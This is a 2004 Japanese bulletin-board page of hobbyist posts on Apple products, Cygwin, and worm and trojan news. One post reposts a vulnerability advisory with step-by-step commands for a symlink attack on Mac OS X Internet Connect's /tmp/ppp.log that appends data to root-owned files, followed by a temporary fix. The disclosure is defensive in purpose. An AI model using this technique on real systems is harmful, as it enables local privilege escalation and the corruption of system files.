投稿者
 メール
  題名
  内容 入力補助動画検索画像・ファイル<IMG><OBJECT>タグが利用可能です。(詳細)
    
  ファイル1
  ファイル2
  ファイル3
アップロード可能な形式(各1MB以内):
画像(gif,png,jpg,bmp) 音楽(mmf,mld) 動画(amc,3gp,3g2)

 URL
[ ケータイで使う ] [ BBSティッカー ] [ 書込み通知 ] [ teacup.コミュニティ ]

投稿募集! スレッド一覧

スレッド作成 他のスレッドを探す

[PR] ハローワークネット 食事券 高知の求人・転職 お好み焼店広島県 GMO SEO
teacup. ] [ 無料掲示板 ] [ プレミアム掲示板 ] [ teacup.コミュニティ ] [ ブログ ] [ チャット ]
【From teacup.】この掲示板は投稿が一定期間無いため、各記事中に広告を表示しています。

全86件の内、新着の記事から10件ずつ表示します。 1  2  3  4  5  6  7  8  9  |  《前のページ |  次のページ》 

コンピュータは、どこに消えたのだろう

 投稿者:Caper  投稿日:2004年 8月31日(火)22時08分21秒
  完全に新しくなったiMac G5。


おフランスはパリで開催されているApple Expo2004で、全世界同時発表ザマス。
あ、か〜るおぢに、先に書かれた・・・。

FirewireやUSBのポート、本体正面に欲しいなぁ・・・。
今度、銀座に行く機会があったら、見に行こう。
あ、心斎橋も行ってみたいなぁ。ホラーマン氏は行ったのかなぁ。

http://www.apple.com/jp/imac/index.html

 


KDE〜Xサーバへの道〜

 投稿者:気仙沼  投稿日:2004年 8月30日(月)14時43分40秒
  cygwinでKDE動かしたいんですがファイルのダウンロードが完了しません。
これってカテゴリのxfree86が入ってないと駄目なんですか?
(それ以前にインストールオプションからxfree86が無くなってます)
 
お得なプロバイダーとくとくBB

メモ

 投稿者:気仙沼  投稿日:2004年 8月29日(日)18時23分42秒
  http://itpro.nikkeibp.co.jp/members/LIN/oss/20040824/148942/
http://itpro.nikkeibp.co.jp/members/LIN/oss/20040824/148958/
http://itpro.nikkeibp.co.jp/members/LIN/oss/20040824/148959/
 
お得なプロバイダーとくとくBB

面白そう...

 投稿者:1円切手  投稿日:2004年 8月20日(金)13時54分54秒
  2003 server は影響しないのかな?

ウィルスと言えば、photos で LOL!;)))) な WORM_RATOS.A は、Symantec のパターンファイルが
update される前に届いてました。今回は16日正午頃から凄い勢いで広がったようですね。

Symantec によると「2004/8/20 21:11:11 以降の場合、このワームは直ちに実行を終了します。」ということで、
もう、そんなに心配はないんでしょうけどね。
 
お得なプロバイダーとくとくBB

Winnyで“ぬるぽ”ウイルスが流行の兆し

 投稿者:気仙沼  投稿日:2004年 8月16日(月)19時42分4秒
  シマンテックは、P2Pファイル共有ソフト「Winny」のネットワークを介して流行しつつあるウイルス「Trojan.Nullpos」(以下、Nullpos)を危険度“1”で警告した。ダメージ、感染力はいずれも“低”。Windows XP/2000/NT/Me/98/95に影響を与える。

 Nullposはトロイの木馬型ウイルスで、感染したPCに「かっとばせ ヌルポース」というダイアログを表示し、デスクトップ上の全アイコンをマイドキュメントのフォルダに移動してしまう。また、「HKEY_CURRENT_USER\Control Panel\Desktop」「HKEY_CURRENT_USER\Control Panel\Screen Saver.Marquee」といったレジストリキーを改変。「Winnyで違法ファイルを集めています。」というスクリーンセーバーを表示するように設定変更を行なう。

 シマンテックでは予防方法として、Winnyを含めた不要なサービスをオフにすること、脆弱性修正プログラムを適用すること、予期せぬファイルは開かないことなどを推奨。
 

0day attack?

 投稿者:1円切手  投稿日:2004年 7月27日(火)12時06分20秒
  良くわからんので貼り付けの刑(^^;
Tested:  Panther 10.3.4 (Internet Connect v1.3)

Problem: Internet Connect allows any file on the file
     system to be altered.

Status: 0day! - Temporary Fix Included.

Description:
     Apples Internet Connect application creates a
     'ppp.log' file in '/tmp/'. If the file already
     exists it is opened in append mode. If it does
     not exist a new file is created.

     It is possible to trick Internet Connect into
     appending data to any file on the filesystem by
     creating a symlink file '/tmp/ppp.log' pointing
     to the file to be altered.

     If the file '/tmp/ppp.log' already exists the
     attack is not possible as the file is owned by
     user 'root' and group 'wheel': -

     $ ls -l /tmp/ppp.log
     -rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log

     However due to the Operating System clearing the
     '/tmp' directory during system startup and also on
     a regular basis due to system maintenance it
     becomes possible to form the attack as shown below:

     First a file is created to represent a system file
     owned and only writable by user 'root'.

     maki:~ # echo "TEST" > /etc/file_owned_by_root
     maki:~ # ls -l /etc/file_owned_by_root
     -rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
     maki:~ # cat /etc/file_owned_by_root
     TEST

     A symlink is now created in the '/tmp' directory to
     point to the file to be altered. It is important to
     realise that the link can be created as a none 'admin'
     or 'root' user.

     maki:/tmp $ id
     uid=502(br00t) gid=502(br00t) groups=502(br00t)

     maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
     maki:/tmp $ ls -l ./ppp.log
     lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /etc/file_owned_by_root

     Now Internet Connect is opened. Under 'configuration'
     choose 'Other'. Enter some text into the 'Telephone
     Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.

     'Cancel' can be clicked several seconds later.

     Checking the original file '/etc/file_owned_by_root'
     we see the following: -

     maki:~ $ cat /etc/file_owned_by_root
     TEST
     Sun Jul 25 00:20:42 2004 : Version 2.0
     Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
     Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
     Sun Jul 25 00:20:58 2004 : Serial link disconnected.

     As can be seen data has been appended to the 'protected' file.

Impact: It is possible for a local user to escalate their
    privileges by appending data to specific system files.
    In addition a malicious user may be able to render the
    machine unusable by corrupting important system files.

...snip...
FIX:  The following commands serve to provide a temporary fix until
    Apple release an official update.

    Open a terminal: /Applications/Utilities/Terminal.app
    Gain root access using 'sudo':

    maki:~ $ sudo sh
    Password:[YOUR PASSWORD]
    maki:~ # whoami
    root

    You can copy and paste the following commands: -

    /usr/bin/touch /tmp/ppp.log
    echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily
    echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common

    These commands ensure that a '/tmp/ppp.log' file is
    present to prevent a user from creating a link as shown
    above. Alternatively the line:

    /usr/bin/touch /tmp/ppp.log

    can be added to each file '/etc/daily' and '/etc/rc.common'
    manually using an editor and root privileges.

何となく、local っぽいので、個人使用の PC には影響が少ないかな?
 
お得なプロバイダーとくとくBB

テレポーテーショ〜ンっ!

 投稿者:Caper  投稿日:2004年 6月19日(土)09時20分35秒
  DQN社員・幕張BOY(あ、オイラも・・・。)の愛読書・科学雑誌「NATURE」に、
「National Institute for Standards and Technologies(NIST)の
科学者らによると、テレポーテーション--つまり、物理的な運動を
全くともなわずに、原子、あるいは少なくともその特性を別の場所に
『転送』すること-は可能だ」という論文が掲載された。
また、その「論文で、ベリリウム原子1個の量子状態(一連のアクティブな
特性)を、別のベリリウム原子に転送することに成功した」と発表した。

この論文では、量子コンピュータの未来をうかがわせる内容の記事になっているが、
幕張BOY的には、「UFO瞬間移動」ネタへと昇華される、良い材料であることは
・・・まちがいないっ!

http://headlines.yahoo.co.jp/hl?a=20040618-00000006-cnet-sci

 

DQN社員(ドキュン社員)

 投稿者:幕張BOY  投稿日:2004年 6月13日(日)00時36分9秒
  2chによりますと、コンピューター会社に何年も居て、基本情報処理の資格すら取れないのを、
”DQN社員”と呼ぶらしいです。
したがって、Caperとわたくしは、DQNです。
 

今日は...

 投稿者:1円切手  投稿日:2004年 6月12日(土)09時04分18秒
  Mac じゃないけど、RealPlayer にセキュリティーホールが見つかったので
使ってる方は Update しておきましょう。
 
お得なプロバイダーとくとくBB

Apple の Mac OS X に複数の脆弱性

 投稿者:気仙沼アドミニストレータ  投稿日:2004年 5月24日(月)22時14分49秒
  Appleは、Mac OS X 10.2.8 "Jaguar" 及び Mac OS X 10.3.3"Panther" の複数の脆弱性に対応した Security Update 2004-05-24 をリリースしました。

[関連情報]
Apple
http://docs.info.apple.com/article.html?artnum=61798
http://www.apple.co.jp/ftp-info/reference/securityupdate_2004-05-24_(10_2_8)J.html
http://www.apple.co.jp/ftp-info/reference/securityupdate__2004-05-24_(10_3_3)J.html

CVE番号
CAN-2004-0485、CAN-2004-0486
 

以上は、新着順41番目から50番目までの記事です。 1  2  3  4  5  6  7  8  9  |  《前のページ |  次のページ》 
/9 


[PR]